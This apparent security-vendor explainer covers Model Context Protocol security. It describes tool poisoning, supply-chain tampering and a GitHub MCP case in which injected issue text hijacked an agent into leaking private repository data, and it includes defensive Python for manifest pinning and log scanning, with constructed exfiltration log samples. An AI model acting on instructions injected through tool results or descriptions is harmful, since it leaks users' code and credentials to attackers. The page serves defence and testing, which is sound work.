MCP Security
What is MCP Security?
MCP security refers to the practice of securing implementations of the Model Context Protocol (MCP), an open standard introduced by Anthropic that allows large language models to connect to external tools, APIs, databases, and data sources. MCP functions as an integration layer between AI models and the real-world systems they act upon, enabling capabilities such as web search, code execution, file access, and third-party service interaction. Because MCP dramatically expands what an AI agent can do, it also dramatically expands the attack surface of any AI deployment that uses it.
Description
Security researchers identified multiple vulnerability classes in MCP ecosystems shortly after its adoption began scaling in 2025. Tool poisoning occurs when a malicious or compromised MCP server misrepresents its capabilities to an AI model, causing it to execute unintended actions. Privilege escalation is possible when MCP servers are configured with overly broad permissions that extend to connected tools and data sources. Remote code execution vulnerabilities have been documented in specific MCP server implementations. Supply chain attacks targeting MCP ecosystems involve injecting malicious logic into popular open-source MCP server packages, which are then downloaded and integrated by developers without thorough security review. In one documented case, a GitHub MCP server allowed a malicious issue to inject hidden prompt injection instructions that hijacked an AI agent and triggered data exfiltration from private repositories. The core security principle for MCP deployments mirrors that of any integration layer: verify what each server can access, enforce least privilege, audit all tool invocations, and treat MCP servers as trust boundaries requiring explicit authentication and authorization, not implicit trust.
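The principles listed above (verify what each server can access, enforce least privilege, treat servers as trust boundaries) can be enforced in the MCP host before any tool call is forwarded. The following Python is an added example and not code from the page or from any MCP implementation: it pins a hash of each approved server's tool manifest so that a changed tool description (the usual vehicle for tool poisoning) is detected, and it checks that the permissions a call needs are a subset of what the organisation granted that server. The server name, tool list, manifest layout and permission strings are constructed assumptions.

```python
import hashlib
import json

# Constructed sample: the tool list the "github-internal" server presented at
# review time. In a real host this would be captured from the server's
# tools/list response when the server was vetted and added to the inventory.
REVIEWED_TOOLS = [
    {
        "name": "read_file",
        "description": "Read a file from the repository.",
        "inputSchema": {"type": "object", "properties": {"path": {"type": "string"}}},
    },
    {
        "name": "list_issues",
        "description": "List open issues.",
        "inputSchema": {"type": "object", "properties": {}},
    },
]


def manifest_digest(tools):
    """SHA-256 over the canonical JSON of every tool's name, description and
    input schema. Any edit to a description, including hidden instructions
    appended by a poisoned server, produces a different digest."""
    canonical = json.dumps(tools, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


# Inventory of approved servers (assumed format): the pinned manifest digest
# plus the permissions granted to that server, nothing broader.
APPROVED_SERVERS = {
    "github-internal": {
        "manifest_sha256": manifest_digest(REVIEWED_TOOLS),
        "allowed_permissions": {"repo:read", "issues:read"},
    },
}


def verify_manifest(server, live_tools):
    """Reject servers that are not in the inventory and servers whose live
    tool list has drifted from the reviewed one."""
    entry = APPROVED_SERVERS.get(server)
    if entry is None:
        return False, "server not in inventory"
    if manifest_digest(live_tools) != entry["manifest_sha256"]:
        return False, "tool manifest changed since review"
    return True, "ok"


def authorize_call(server, requested_permissions):
    """Least privilege: every permission the call needs must already be in
    the server's approved set."""
    entry = APPROVED_SERVERS.get(server)
    if entry is None:
        return False
    return set(requested_permissions) <= entry["allowed_permissions"]


def gate_tool_call(server, live_tools, tool_name, requested_permissions):
    """Combined check a host runs before forwarding a tool invocation.
    Returns (allowed, reason) so the decision can be logged either way."""
    ok, reason = verify_manifest(server, live_tools)
    if not ok:
        return False, reason
    if tool_name not in {t["name"] for t in live_tools}:
        return False, "tool not in reviewed manifest"
    if not authorize_call(server, requested_permissions):
        return False, "permission not granted to this server"
    return True, "allowed"


if __name__ == "__main__":
    print(gate_tool_call("github-internal", REVIEWED_TOOLS, "read_file", ["repo:read"]))
```

Pinning the whole manifest rather than only tool names is deliberate: tool poisoning typically leaves names and schemas intact and changes only the free-text description the model reads, so the description must be part of what is hashed. Re-pinning should be a reviewed change, not an automatic refresh.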
Usage and Examples
An enterprise deploys an internal AI coding assistant connected to its GitHub repository via an MCP server. A developer installs a community-contributed MCP server that has been tampered with in a supply chain attack. When the AI assistant invokes the poisoned server, it silently reads private source code, extracts API keys from environment variables, and exfiltrates them to an attacker-controlled endpoint, all as part of routine coding workflow operations that look benign in logs. Because MCP transactions occur between the model and connected systems rather than through user-facing interfaces, traditional application security monitoring may miss these exfiltration events entirely. Organizations managing agentic AI deployments should maintain an inventory of all MCP servers in use, validate their provenance, and monitor tool invocation logs for anomalous patterns.
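The monitoring recommended in the scenario above can be expressed as a small set of detection rules run over the host's tool invocation log. The Python below is an added example, not code from the page or from any MCP product: it parses constructed JSON-lines invocation records (the field names, server names, allowlists and sample values are all assumptions) and flags calls from servers outside the inventory, outbound connections to hosts outside the allowlist, sensitive file paths in arguments, and credential-shaped strings in request payloads.

```python
import json
import re

# Constructed allowlists; a real deployment would load these from the same
# inventory that approves servers in the first place.
APPROVED_SERVERS = {"github-internal"}
APPROVED_OUTBOUND_HOSTS = {"api.github.com"}

# Credential-shaped strings that should never appear in a tool payload.
# The AKIA prefix is the documented shape of AWS access key IDs; the
# ghp_ prefix is the documented shape of GitHub personal access tokens.
SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),
    re.compile(r"ghp_[A-Za-z0-9]{20,}"),
]
# Files that a coding assistant has no routine reason to read.
SENSITIVE_PATH = re.compile(r"\.env\b|id_rsa|\.aws/credentials")

# Constructed sample log: one benign call from the approved server, then a
# community server reading a secrets file and posting a key off-site.
SAMPLE_LOG = """
{"ts":"2025-06-01T10:00:01Z","server":"github-internal","tool":"list_issues","args":{},"outbound_host":"api.github.com"}
{"ts":"2025-06-01T10:00:05Z","server":"community-helper","tool":"read_file","args":{"path":".env"},"outbound_host":null}
{"ts":"2025-06-01T10:00:06Z","server":"community-helper","tool":"http_post","args":{"body":"AWS_ACCESS_KEY_ID=AKIAEXAMPLEKEY000000"},"outbound_host":"collect.example.net"}
"""


def iter_events(log_text):
    """Yield one dict per non-empty JSON line."""
    for line in log_text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def scan_event(event):
    """Return the list of rule names a single invocation record trips."""
    findings = []
    if event["server"] not in APPROVED_SERVERS:
        findings.append("unapproved_server")
    host = event.get("outbound_host")
    if host and host not in APPROVED_OUTBOUND_HOSTS:
        findings.append("unapproved_outbound_host")
    # Serialise the arguments once so nested values are scanned too.
    payload = json.dumps(event.get("args", {}))
    if SENSITIVE_PATH.search(payload):
        findings.append("sensitive_path")
    if any(p.search(payload) for p in SECRET_PATTERNS):
        findings.append("secret_in_payload")
    return findings


def analyze_log(log_text):
    """Run every rule over every event and return one finding per hit,
    keyed by timestamp, server and tool so it can be routed to a SIEM."""
    report = []
    for event in iter_events(log_text):
        for rule in scan_event(event):
            report.append(
                {"ts": event["ts"], "server": event["server"], "tool": event["tool"], "rule": rule}
            )
    return report


if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding)
```

The rules are intentionally independent so that a single event can produce several findings; in the sample the exfiltration call trips the server, host and secret rules at once, which is the correlation a responder would want to see in one place. Note the log fields this assumes (the calling server, the outbound host, the serialised arguments) must actually be recorded by the host; an invocation log that stores only the tool name gives these rules nothing to work with.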
How Does This Relate to Penetration Testing?
Assessing MCP security requires penetration testers to evaluate the full integration chain connecting AI models to external systems. This includes reviewing MCP server configurations for overprivileged access, testing for tool poisoning scenarios, attempting prompt injection through MCP-connected data sources, and analyzing the authentication mechanisms governing MCP server connections. As MCP adoption accelerates, security assessments of AI-powered applications should explicitly scope MCP integrations as attack surfaces. Evolve Security's AI Penetration Testing engagements cover MCP security as part of a comprehensive AI attack surface review, assessing MCP configurations and agentic AI architectures to identify privilege escalation paths, tool poisoning risks, and supply chain exposure.